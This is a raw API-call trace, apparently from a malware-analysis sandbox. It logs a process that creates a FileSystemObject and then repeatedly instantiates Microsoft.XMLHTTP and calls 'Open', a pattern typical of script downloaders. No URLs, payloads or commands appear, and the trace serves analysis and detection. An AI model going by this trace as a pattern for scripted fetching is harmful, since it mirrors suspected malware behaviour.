	[0236.727] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0236.731] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0236.731] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0236.731] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0236.731] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0236.731] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0236.731] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0236.762] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0236.762] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0236.762] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0236.765] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0236.765] SysStringLen (param_1=0x0) returned 0x0
	[0236.765] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0236.765] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0236.765] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0236.765] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0236.765] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0236.765] ??2@YAPEAX_K@Z () returned 0x62f310
	[0236.765] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f310) 
	[0236.765] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0236.766] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0236.766] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0236.766] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0236.766] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.766] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0236.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.770] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0236.770] SysStringLen (param_1=0x0) returned 0x0
	[0236.770] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0236.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0236.770] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0236.770] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0236.770] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0236.771] ??2@YAPEAX_K@Z () returned 0x62f330
	[0236.771] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f330) 
	[0236.771] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0236.771] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0236.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0236.771] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0236.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.771] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0236.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.771] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0236.771] SysStringLen (param_1=0x0) returned 0x0
	[0236.771] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0236.771] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0236.771] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0236.772] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0236.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0236.772] ??2@YAPEAX_K@Z () returned 0x62f310
	[0236.772] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0236.772] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0236.772] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0236.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0236.772] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0236.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.772] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0236.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.772] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0236.772] SysStringLen (param_1=0x0) returned 0x0
	[0236.772] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0236.772] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0236.772] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0236.773] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0236.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0236.773] ??2@YAPEAX_K@Z () returned 0x62f330
	[0236.773] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f330) 
	[0236.773] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0236.773] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0236.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0236.773] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0236.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.773] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0236.773] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.773] longjmp () 
	[0236.773] longjmp () 
	[0236.773] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0236.773] SysStringLen (param_1=0x0) returned 0x0
	[0236.773] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0236.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0236.774] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0236.774] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0236.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0236.774] ??2@YAPEAX_K@Z () returned 0x62f310
	[0236.774] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0236.774] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0236.774] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0236.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0236.774] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0236.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0236.774] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0236.774] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0236.774] longjmp () 
	[0236.774] longjmp () 
	[0236.774] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0236.775] SysStringLen (param_1=0x0) returned 0x0
	[0236.775] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0236.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0236.775] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0236.775] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0236.775] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0236.775] ??2@YAPEAX_K@Z () returned 0x62f330
